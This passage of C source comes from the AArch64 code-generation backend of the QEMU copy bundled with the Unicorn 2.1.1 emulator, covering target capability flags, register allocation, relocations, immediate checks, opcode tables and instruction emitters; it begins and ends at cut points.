TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_CALL_ALIGN_ARGS 1 #define TCG_TARGET_CALL_STACK_OFFSET 0 /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 1 #define TCG_TARGET_HAS_eqv_i32 1 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 1 #define TCG_TARGET_HAS_ctz_i32 1 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 1 #define TCG_TARGET_HAS_extract_i32 1 #define TCG_TARGET_HAS_sextract_i32 1 #define TCG_TARGET_HAS_extract2_i32 1 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_andc_i64 1 #define TCG_TARGET_HAS_orc_i64 1 #define TCG_TARGET_HAS_eqv_i64 1 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 1 #define TCG_TARGET_HAS_ctz_i64 1 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 1 #define TCG_TARGET_HAS_extract_i64 1 #define TCG_TARGET_HAS_sextract_i64 1 #define 
TCG_TARGET_HAS_extract2_i64 1 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 1 #define TCG_TARGET_HAS_mulsh_i64 1 #define TCG_TARGET_HAS_direct_jump 1 #define TCG_TARGET_HAS_v64 1 #define TCG_TARGET_HAS_v128 1 #define TCG_TARGET_HAS_v256 0 #define TCG_TARGET_HAS_andc_vec 1 #define TCG_TARGET_HAS_orc_vec 1 #define TCG_TARGET_HAS_not_vec 1 #define TCG_TARGET_HAS_neg_vec 1 #define TCG_TARGET_HAS_abs_vec 1 #define TCG_TARGET_HAS_shi_vec 1 #define TCG_TARGET_HAS_shs_vec 0 #define TCG_TARGET_HAS_shv_vec 1 #define TCG_TARGET_HAS_cmp_vec 1 #define TCG_TARGET_HAS_mul_vec 1 #define TCG_TARGET_HAS_sat_vec 1 #define TCG_TARGET_HAS_minmax_vec 1 #define TCG_TARGET_HAS_bitsel_vec 1 #define TCG_TARGET_HAS_cmpsel_vec 0 #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { #if defined(__APPLE__) /* * On Intel-based Mac computers, this function does nothing. * Source: https://developer.apple.com/documentation/apple_silicon/porting_just-in-time_compilers_to_apple_silicon?language=objc */ sys_icache_invalidate((char *)start, stop - start); #else __builtin___clear_cache((char *)start, (char *)stop); #endif } void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif /* AARCH64_TCG_TARGET_H */

unicorn-2.1.1/qemu/tcg/aarch64/tcg-target.inc.c

/* * Initial TCG Implementation for aarch64 * * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH * Written by Claudio Fontana * * This work is licensed under the terms of the GNU GPL, version 2 or * (at your option) any later version. * * See the COPYING file in the top-level directory for details. */ #include "../tcg-pool.inc.c" #include "qemu/bitops.h" /* We're going to re-use TCGType in setting of the SF bit, which controls the size of the operation performed. If we know the values match, it makes things much cleaner.
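(For instance, the emitters below compute "insn | ext << 31" with a TCGType ext, which directly yields the AArch64 SF bit: 0 for 32-bit, 1 for 64-bit operations.)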
*/ QEMU_BUILD_BUG_ON(TCG_TYPE_I32 != 0 || TCG_TYPE_I64 != 1); #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "x0", "x1", "x2", "x3", "x4", "x5", "x6", "x7", "x8", "x9", "x10", "x11", "x12", "x13", "x14", "x15", "x16", "x17", "x18", "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26", "x27", "x28", "fp", "x30", "sp", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25", "v26", "v27", "v28", "fp", "v30", "v31", }; #endif /* CONFIG_DEBUG_TCG */ static const int tcg_target_reg_alloc_order[] = { TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, TCG_REG_X28, /* we will reserve this for guest_base if configured */ TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, TCG_REG_X16, TCG_REG_X17, TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, /* X18 reserved by system */ /* X19 reserved for AREG0 */ /* X29 reserved as fp */ /* X30 reserved as temporary */ TCG_REG_V0, TCG_REG_V1, TCG_REG_V2, TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, /* V8 - V15 are call-saved, and skipped. */ TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, TCG_REG_V20, TCG_REG_V21, TCG_REG_V22, TCG_REG_V23, TCG_REG_V24, TCG_REG_V25, TCG_REG_V26, TCG_REG_V27, TCG_REG_V28, TCG_REG_V29, TCG_REG_V30, TCG_REG_V31, }; static const int tcg_target_call_iarg_regs[8] = { TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7 }; static const int tcg_target_call_oarg_regs[1] = { TCG_REG_X0 }; #define TCG_REG_TMP TCG_REG_X30 #define TCG_VEC_TMP TCG_REG_V31 #ifndef CONFIG_SOFTMMU /* Note that XZR cannot be encoded in the address base register slot, as that actually encodes SP. So if we need to zero-extend the guest address, via the address index register slot, we need to load even a zero guest base into a register. */ #define USE_GUEST_BASE (guest_base != 0 || TARGET_LONG_BITS == 32) #define TCG_REG_GUEST_BASE TCG_REG_X28 #endif static inline bool reloc_pc26(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = target - code_ptr; if (offset == sextract64(offset, 0, 26)) { /* read instruction, mask away previous PC_REL26 parameter contents, set the proper offset, then write back the instruction.
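The 26-bit signed field counts instruction words, giving a branch range of +/-128MB from the current instruction.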
*/ *code_ptr = deposit32(*code_ptr, 0, 26, offset); return true; } return false; } static inline bool reloc_pc19(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = target - code_ptr; if (offset == sextract64(offset, 0, 19)) { *code_ptr = deposit32(*code_ptr, 5, 19, offset); return true; } return false; } static inline bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_debug_assert(addend == 0); switch (type) { case R_AARCH64_JUMP26: case R_AARCH64_CALL26: return reloc_pc26(code_ptr, (tcg_insn_unit *)value); case R_AARCH64_CONDBR19: return reloc_pc19(code_ptr, (tcg_insn_unit *)value); default: g_assert_not_reached(); } } #define TCG_CT_CONST_AIMM 0x100 #define TCG_CT_CONST_LIMM 0x200 #define TCG_CT_CONST_ZERO 0x400 #define TCG_CT_CONST_MONE 0x800 #define TCG_CT_CONST_ORRI 0x1000 #define TCG_CT_CONST_ANDI 0x2000 /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': /* general registers */ ct->ct |= TCG_CT_REG; ct->u.regs |= 0xffffffffu; break; case 'w': /* advsimd registers */ ct->ct |= TCG_CT_REG; ct->u.regs |= 0xffffffff00000000ull; break; case 'l': /* qemu_ld / qemu_st address, data_reg */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffffu; #ifdef CONFIG_SOFTMMU /* x0 and x1 will be overwritten when reading the tlb entry, and x2, and x3 for helper args, better to avoid using them. */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_X0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_X1); tcg_regset_reset_reg(ct->u.regs, TCG_REG_X2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_X3); #endif break; case 'A': /* Valid for arithmetic immediate (positive or negative). */ ct->ct |= TCG_CT_CONST_AIMM; break; case 'L': /* Valid for logical immediate. */ ct->ct |= TCG_CT_CONST_LIMM; break; case 'M': /* minus one */ ct->ct |= TCG_CT_CONST_MONE; break; case 'O': /* vector orr/bic immediate */ ct->ct |= TCG_CT_CONST_ORRI; break; case 'N': /* vector orr/bic immediate, inverted */ ct->ct |= TCG_CT_CONST_ANDI; break; case 'Z': /* zero */ ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* Match a constant valid for addition (12-bit, optionally shifted). */ static inline bool is_aimm(uint64_t val) { return (val & ~0xfff) == 0 || (val & ~0xfff000) == 0; } /* Match a constant valid for logical operations. */ static inline bool is_limm(uint64_t val) { /* Taking a simplified view of the logical immediates for now, ignoring the replication that can happen across the field. Match bit patterns of the forms 0....01....1 0..01..10..0 and their inverses. */ /* Make things easier below, by testing the form with msb clear. */ if ((int64_t)val < 0) { val = ~val; } if (val == 0) { return false; } val += val & -val; return (val & (val - 1)) == 0; } /* Return true if v16 is a valid 16-bit shifted immediate. */ static bool is_shimm16(uint16_t v16, int *cmode, int *imm8) { if (v16 == (v16 & 0xff)) { *cmode = 0x8; *imm8 = v16 & 0xff; return true; } else if (v16 == (v16 & 0xff00)) { *cmode = 0xa; *imm8 = v16 >> 8; return true; } return false; } /* Return true if v32 is a valid 32-bit shifted immediate. 
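E.g. 0x00ab0000 is valid (cmode 0x4, imm8 0xab); values with more than one non-zero byte are not.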
*/ static bool is_shimm32(uint32_t v32, int *cmode, int *imm8) { if (v32 == (v32 & 0xff)) { *cmode = 0x0; *imm8 = v32 & 0xff; return true; } else if (v32 == (v32 & 0xff00)) { *cmode = 0x2; *imm8 = (v32 >> 8) & 0xff; return true; } else if (v32 == (v32 & 0xff0000)) { *cmode = 0x4; *imm8 = (v32 >> 16) & 0xff; return true; } else if (v32 == (v32 & 0xff000000)) { *cmode = 0x6; *imm8 = v32 >> 24; return true; } return false; } /* Return true if v32 is a valid 32-bit shifting ones immediate. */ static bool is_soimm32(uint32_t v32, int *cmode, int *imm8) { if ((v32 & 0xffff00ff) == 0xff) { *cmode = 0xc; *imm8 = (v32 >> 8) & 0xff; return true; } else if ((v32 & 0xff00ffff) == 0xffff) { *cmode = 0xd; *imm8 = (v32 >> 16) & 0xff; return true; } return false; } /* Return true if v32 is a valid float32 immediate. */ static bool is_fimm32(uint32_t v32, int *cmode, int *imm8) { if (extract32(v32, 0, 19) == 0 && (extract32(v32, 25, 6) == 0x20 || extract32(v32, 25, 6) == 0x1f)) { *cmode = 0xf; *imm8 = (extract32(v32, 31, 1) << 7) | (extract32(v32, 25, 1) << 6) | extract32(v32, 19, 6); return true; } return false; } /* Return true if v64 is a valid float64 immediate. */ static bool is_fimm64(uint64_t v64, int *cmode, int *imm8) { if (extract64(v64, 0, 48) == 0 && (extract64(v64, 54, 9) == 0x100 || extract64(v64, 54, 9) == 0x0ff)) { *cmode = 0xf; *imm8 = (extract64(v64, 63, 1) << 7) | (extract64(v64, 54, 1) << 6) | extract64(v64, 48, 6); return true; } return false; } /* * Return non-zero if v32 can be formed by MOVI+ORR. * Place the parameters for MOVI in (cmode, imm8). * Return the cmode for ORR; the imm8 can be had via extraction from v32. */ static int is_shimm32_pair(uint32_t v32, int *cmode, int *imm8) { int i; for (i = 6; i > 0; i -= 2) { /* Mask out one byte we can add with ORR. */ uint32_t tmp = v32 & ~(0xffu << (i * 4)); if (is_shimm32(tmp, cmode, imm8) || is_soimm32(tmp, cmode, imm8)) { break; } } return i; } /* Return true if V is a valid 16-bit or 32-bit shifted immediate. */ static bool is_shimm1632(uint32_t v32, int *cmode, int *imm8) { if (v32 == deposit32(v32, 16, 16, v32)) { return is_shimm16(v32, cmode, imm8); } else { return is_shimm32(v32, cmode, imm8); } } static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if (type == TCG_TYPE_I32) { val = (int32_t)val; } if ((ct & TCG_CT_CONST_AIMM) && (is_aimm(val) || is_aimm(-val))) { return 1; } if ((ct & TCG_CT_CONST_LIMM) && is_limm(val)) { return 1; } if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } if ((ct & TCG_CT_CONST_MONE) && val == -1) { return 1; } switch (ct & (TCG_CT_CONST_ORRI | TCG_CT_CONST_ANDI)) { case 0: break; case TCG_CT_CONST_ANDI: val = ~val; /* fallthru */ case TCG_CT_CONST_ORRI: if (val == deposit64(val, 32, 32, val)) { int cmode, imm8; return is_shimm1632(val, &cmode, &imm8); } break; default: /* Both bits should not be set for the same insn. 
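A constraint may request 'O' (orr/bic) or 'N' (and/orn), never both, so reaching here indicates a backend bug.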
*/ g_assert_not_reached(); } return 0; } enum aarch64_cond_code { COND_EQ = 0x0, COND_NE = 0x1, COND_CS = 0x2, /* Unsigned greater or equal */ COND_HS = COND_CS, /* ALIAS greater or equal */ COND_CC = 0x3, /* Unsigned less than */ COND_LO = COND_CC, /* ALIAS Lower */ COND_MI = 0x4, /* Negative */ COND_PL = 0x5, /* Zero or greater */ COND_VS = 0x6, /* Overflow */ COND_VC = 0x7, /* No overflow */ COND_HI = 0x8, /* Unsigned greater than */ COND_LS = 0x9, /* Unsigned less or equal */ COND_GE = 0xa, COND_LT = 0xb, COND_GT = 0xc, COND_LE = 0xd, COND_AL = 0xe, COND_NV = 0xf, /* behaves like COND_AL here */ }; static const enum aarch64_cond_code tcg_cond_to_aarch64[] = { [TCG_COND_EQ] = COND_EQ, [TCG_COND_NE] = COND_NE, [TCG_COND_LT] = COND_LT, [TCG_COND_GE] = COND_GE, [TCG_COND_LE] = COND_LE, [TCG_COND_GT] = COND_GT, /* unsigned */ [TCG_COND_LTU] = COND_LO, [TCG_COND_GTU] = COND_HI, [TCG_COND_GEU] = COND_HS, [TCG_COND_LEU] = COND_LS, }; typedef enum { LDST_ST = 0, /* store */ LDST_LD = 1, /* load */ LDST_LD_S_X = 2, /* load and sign-extend into Xt */ LDST_LD_S_W = 3, /* load and sign-extend into Wt */ } AArch64LdstType; /* We encode the format of the insn into the beginning of the name, so that we can have the preprocessor help "typecheck" the insn vs the output function. Arm didn't provide us with nice names for the formats, so we use the section number of the architecture reference manual in which the instruction group is described. */ typedef enum { /* Compare and branch (immediate). */ I3201_CBZ = 0x34000000, I3201_CBNZ = 0x35000000, /* Conditional branch (immediate). */ I3202_B_C = 0x54000000, /* Unconditional branch (immediate). */ I3206_B = 0x14000000, I3206_BL = 0x94000000, /* Unconditional branch (register). */ I3207_BR = 0xd61f0000, I3207_BLR = 0xd63f0000, I3207_RET = 0xd65f0000, /* AdvSIMD load/store single structure. */ I3303_LD1R = 0x0d40c000, /* Load literal for loading the address at pc-relative offset */ I3305_LDR = 0x58000000, I3305_LDR_v64 = 0x5c000000, I3305_LDR_v128 = 0x9c000000, /* Load/store register. Described here as 3.3.12, but the helper that emits them can transform to 3.3.10 or 3.3.13. */ I3312_STRB = 0x38000000 | LDST_ST << 22 | MO_8 << 30, I3312_STRH = 0x38000000 | LDST_ST << 22 | MO_16 << 30, I3312_STRW = 0x38000000 | LDST_ST << 22 | MO_32 << 30, I3312_STRX = 0x38000000 | LDST_ST << 22 | MO_64 << 30, I3312_LDRB = 0x38000000 | LDST_LD << 22 | MO_8 << 30, I3312_LDRH = 0x38000000 | LDST_LD << 22 | MO_16 << 30, I3312_LDRW = 0x38000000 | LDST_LD << 22 | MO_32 << 30, I3312_LDRX = 0x38000000 | LDST_LD << 22 | MO_64 << 30, I3312_LDRSBW = 0x38000000 | LDST_LD_S_W << 22 | MO_8 << 30, I3312_LDRSHW = 0x38000000 | LDST_LD_S_W << 22 | MO_16 << 30, I3312_LDRSBX = 0x38000000 | LDST_LD_S_X << 22 | MO_8 << 30, I3312_LDRSHX = 0x38000000 | LDST_LD_S_X << 22 | MO_16 << 30, I3312_LDRSWX = 0x38000000 | LDST_LD_S_X << 22 | MO_32 << 30, I3312_LDRVS = 0x3c000000 | LDST_LD << 22 | MO_32 << 30, I3312_STRVS = 0x3c000000 | LDST_ST << 22 | MO_32 << 30, I3312_LDRVD = 0x3c000000 | LDST_LD << 22 | MO_64 << 30, I3312_STRVD = 0x3c000000 | LDST_ST << 22 | MO_64 << 30, I3312_LDRVQ = 0x3c000000 | 3 << 22 | 0 << 30, I3312_STRVQ = 0x3c000000 | 2 << 22 | 0 << 30, I3312_TO_I3310 = 0x00200800, I3312_TO_I3313 = 0x01000000, /* Load/store register pair instructions. */ I3314_LDP = 0x28400000, I3314_STP = 0x28000000, /* Add/subtract immediate instructions. */ I3401_ADDI = 0x11000000, I3401_ADDSI = 0x31000000, I3401_SUBI = 0x51000000, I3401_SUBSI = 0x71000000, /* Bitfield instructions. 
*/ I3402_BFM = 0x33000000, I3402_SBFM = 0x13000000, I3402_UBFM = 0x53000000, /* Extract instruction. */ I3403_EXTR = 0x13800000, /* Logical immediate instructions. */ I3404_ANDI = 0x12000000, I3404_ORRI = 0x32000000, I3404_EORI = 0x52000000, /* Move wide immediate instructions. */ I3405_MOVN = 0x12800000, I3405_MOVZ = 0x52800000, I3405_MOVK = 0x72800000, /* PC relative addressing instructions. */ I3406_ADR = 0x10000000, I3406_ADRP = 0x90000000, /* Add/subtract shifted register instructions (without a shift). */ I3502_ADD = 0x0b000000, I3502_ADDS = 0x2b000000, I3502_SUB = 0x4b000000, I3502_SUBS = 0x6b000000, /* Add/subtract shifted register instructions (with a shift). */ I3502S_ADD_LSL = I3502_ADD, /* Add/subtract with carry instructions. */ I3503_ADC = 0x1a000000, I3503_SBC = 0x5a000000, /* Conditional select instructions. */ I3506_CSEL = 0x1a800000, I3506_CSINC = 0x1a800400, I3506_CSINV = 0x5a800000, I3506_CSNEG = 0x5a800400, /* Data-processing (1 source) instructions. */ I3507_CLZ = 0x5ac01000, I3507_RBIT = 0x5ac00000, I3507_REV16 = 0x5ac00400, I3507_REV32 = 0x5ac00800, I3507_REV64 = 0x5ac00c00, /* Data-processing (2 source) instructions. */ I3508_LSLV = 0x1ac02000, I3508_LSRV = 0x1ac02400, I3508_ASRV = 0x1ac02800, I3508_RORV = 0x1ac02c00, I3508_SMULH = 0x9b407c00, I3508_UMULH = 0x9bc07c00, I3508_UDIV = 0x1ac00800, I3508_SDIV = 0x1ac00c00, /* Data-processing (3 source) instructions. */ I3509_MADD = 0x1b000000, I3509_MSUB = 0x1b008000, /* Logical shifted register instructions (without a shift). */ I3510_AND = 0x0a000000, I3510_BIC = 0x0a200000, I3510_ORR = 0x2a000000, I3510_ORN = 0x2a200000, I3510_EOR = 0x4a000000, I3510_EON = 0x4a200000, I3510_ANDS = 0x6a000000, /* Logical shifted register instructions (with a shift). */ I3502S_AND_LSR = I3510_AND | (1 << 22), /* AdvSIMD copy */ I3605_DUP = 0x0e000400, I3605_INS = 0x4e001c00, I3605_UMOV = 0x0e003c00, /* AdvSIMD modified immediate */ I3606_MOVI = 0x0f000400, I3606_MVNI = 0x2f000400, I3606_BIC = 0x2f001400, I3606_ORR = 0x0f001400, /* AdvSIMD shift by immediate */ I3614_SSHR = 0x0f000400, I3614_SSRA = 0x0f001400, I3614_SHL = 0x0f005400, I3614_USHR = 0x2f000400, I3614_USRA = 0x2f001400, /* AdvSIMD three same. */ I3616_ADD = 0x0e208400, I3616_AND = 0x0e201c00, I3616_BIC = 0x0e601c00, I3616_BIF = 0x2ee01c00, I3616_BIT = 0x2ea01c00, I3616_BSL = 0x2e601c00, I3616_EOR = 0x2e201c00, I3616_MUL = 0x0e209c00, I3616_ORR = 0x0ea01c00, I3616_ORN = 0x0ee01c00, I3616_SUB = 0x2e208400, I3616_CMGT = 0x0e203400, I3616_CMGE = 0x0e203c00, I3616_CMTST = 0x0e208c00, I3616_CMHI = 0x2e203400, I3616_CMHS = 0x2e203c00, I3616_CMEQ = 0x2e208c00, I3616_SMAX = 0x0e206400, I3616_SMIN = 0x0e206c00, I3616_SSHL = 0x0e204400, I3616_SQADD = 0x0e200c00, I3616_SQSUB = 0x0e202c00, I3616_UMAX = 0x2e206400, I3616_UMIN = 0x2e206c00, I3616_UQADD = 0x2e200c00, I3616_UQSUB = 0x2e202c00, I3616_USHL = 0x2e204400, /* AdvSIMD two-reg misc. */ I3617_CMGT0 = 0x0e208800, I3617_CMEQ0 = 0x0e209800, I3617_CMLT0 = 0x0e20a800, I3617_CMGE0 = 0x2e208800, I3617_CMLE0 = 0x2e20a800, I3617_NOT = 0x2e205800, I3617_ABS = 0x0e20b800, I3617_NEG = 0x2e20b800, /* System instructions. */ NOP = 0xd503201f, DMB_ISH = 0xd50338bf, DMB_LD = 0x00000100, DMB_ST = 0x00000200, } AArch64Insn; static inline uint32_t tcg_in32(TCGContext *s) { uint32_t v = *(uint32_t *)s->code_ptr; return v; } /* Emit an opcode with "type-checking" of the format. */ #define tcg_out_insn(S, FMT, OP, ...) 
\ glue(tcg_out_insn_,FMT)(S, glue(glue(glue(I,FMT),_),OP), ## __VA_ARGS__) static void tcg_out_insn_3303(TCGContext *s, AArch64Insn insn, bool q, TCGReg rt, TCGReg rn, unsigned size) { tcg_out32(s, insn | (rt & 0x1f) | (rn << 5) | (size << 10) | (q << 30)); } static void tcg_out_insn_3305(TCGContext *s, AArch64Insn insn, int imm19, TCGReg rt) { tcg_out32(s, insn | (imm19 & 0x7ffff) << 5 | rt); } static void tcg_out_insn_3201(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rt, int imm19) { tcg_out32(s, insn | ext << 31 | (imm19 & 0x7ffff) << 5 | rt); } static void tcg_out_insn_3202(TCGContext *s, AArch64Insn insn, TCGCond c, int imm19) { tcg_out32(s, insn | tcg_cond_to_aarch64[c] | (imm19 & 0x7ffff) << 5); } static void tcg_out_insn_3206(TCGContext *s, AArch64Insn insn, int imm26) { tcg_out32(s, insn | (imm26 & 0x03ffffff)); } static void tcg_out_insn_3207(TCGContext *s, AArch64Insn insn, TCGReg rn) { tcg_out32(s, insn | rn << 5); } static void tcg_out_insn_3314(TCGContext *s, AArch64Insn insn, TCGReg r1, TCGReg r2, TCGReg rn, tcg_target_long ofs, bool pre, bool w) { insn |= 1u << 31; /* ext */ insn |= pre << 24; insn |= w << 23; tcg_debug_assert(ofs >= -0x200 && ofs < 0x200 && (ofs & 7) == 0); insn |= (ofs & (0x7f << 3)) << (15 - 3); tcg_out32(s, insn | r2 << 10 | rn << 5 | r1); } static void tcg_out_insn_3401(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, uint64_t aimm) { if (aimm > 0xfff) { tcg_debug_assert((aimm & 0xfff) == 0); aimm >>= 12; tcg_debug_assert(aimm <= 0xfff); aimm |= 1 << 12; /* apply LSL 12 */ } tcg_out32(s, insn | ext << 31 | aimm << 10 | rn << 5 | rd); } /* This function can be used for both 3.4.2 (Bitfield) and 3.4.4 (Logical immediate). Both insn groups have N, IMMR and IMMS fields that feed the DecodeBitMasks pseudo function. */ static void tcg_out_insn_3402(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, int n, int immr, int imms) { tcg_out32(s, insn | ext << 31 | n << 22 | immr << 16 | imms << 10 | rn << 5 | rd); } #define tcg_out_insn_3404 tcg_out_insn_3402 static void tcg_out_insn_3403(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, int imms) { tcg_out32(s, insn | ext << 31 | ext << 22 | rm << 16 | imms << 10 | rn << 5 | rd); } /* This function is used for the Move (wide immediate) instruction group. Note that SHIFT is a full shift count, not the 2 bit HW field. */ static void tcg_out_insn_3405(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, uint16_t half, unsigned shift) { tcg_debug_assert((shift & ~0x30) == 0); tcg_out32(s, insn | ext << 31 | shift << (21 - 4) | half << 5 | rd); } static void tcg_out_insn_3406(TCGContext *s, AArch64Insn insn, TCGReg rd, int64_t disp) { tcg_out32(s, insn | (disp & 3) << 29 | (disp & 0x1ffffc) << (5 - 2) | rd); } /* This function is for 3.5.2 (Add/Subtract shifted register), for the rare occasion when we actually want to supply a shift amount. */ static inline void tcg_out_insn_3502S(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, int imm6) { tcg_out32(s, insn | ext << 31 | rm << 16 | imm6 << 10 | rn << 5 | rd); } /* This function is for 3.5.2 (Add/subtract shifted register), and 3.5.10 (Logical shifted register), for the vast majority of cases when we don't want to apply a shift. Thus it can also be used for 3.5.3 (Add/subtract with carry) and 3.5.8 (Data processing 2 source).
*/ static void tcg_out_insn_3502(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm) { tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd); } #define tcg_out_insn_3503 tcg_out_insn_3502 #define tcg_out_insn_3508 tcg_out_insn_3502 #define tcg_out_insn_3510 tcg_out_insn_3502 static void tcg_out_insn_3506(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, TCGCond c) { tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd | tcg_cond_to_aarch64[c] << 12); } static void tcg_out_insn_3507(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn) { tcg_out32(s, insn | ext << 31 | rn << 5 | rd); } static void tcg_out_insn_3509(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, TCGReg ra) { tcg_out32(s, insn | ext << 31 | rm << 16 | ra << 10 | rn << 5 | rd); } static void tcg_out_insn_3605(TCGContext *s, AArch64Insn insn, bool q, TCGReg rd, TCGReg rn, int dst_idx, int src_idx) { /* Note that bit 11 set means general register input. Therefore we can handle both register sets with one function. */ tcg_out32(s, insn | q << 30 | (dst_idx << 16) | (src_idx << 11) | (rd & 0x1f) | (~rn & 0x20) << 6 | (rn & 0x1f) << 5); } static void tcg_out_insn_3606(TCGContext *s, AArch64Insn insn, bool q, TCGReg rd, bool op, int cmode, uint8_t imm8) { tcg_out32(s, insn | q << 30 | op << 29 | cmode << 12 | (rd & 0x1f) | (imm8 & 0xe0) << (16 - 5) | (imm8 & 0x1f) << 5); } static void tcg_out_insn_3614(TCGContext *s, AArch64Insn insn, bool q, TCGReg rd, TCGReg rn, unsigned immhb) { tcg_out32(s, insn | q << 30 | immhb << 16 | (rn & 0x1f) << 5 | (rd & 0x1f)); } static void tcg_out_insn_3616(TCGContext *s, AArch64Insn insn, bool q, unsigned size, TCGReg rd, TCGReg rn, TCGReg rm) { tcg_out32(s, insn | q << 30 | (size << 22) | (rm & 0x1f) << 16 | (rn & 0x1f) << 5 | (rd & 0x1f)); } static void tcg_out_insn_3617(TCGContext *s, AArch64Insn insn, bool q, unsigned size, TCGReg rd, TCGReg rn) { tcg_out32(s, insn | q << 30 | (size << 22) | (rn & 0x1f) << 5 | (rd & 0x1f)); } static void tcg_out_insn_3310(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg base, TCGType ext, TCGReg regoff) { /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ tcg_out32(s, insn | I3312_TO_I3310 | regoff << 16 | 0x4000 | ext << 13 | base << 5 | (rd & 0x1f)); } static void tcg_out_insn_3312(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg rn, intptr_t offset) { tcg_out32(s, insn | (offset & 0x1ff) << 12 | rn << 5 | (rd & 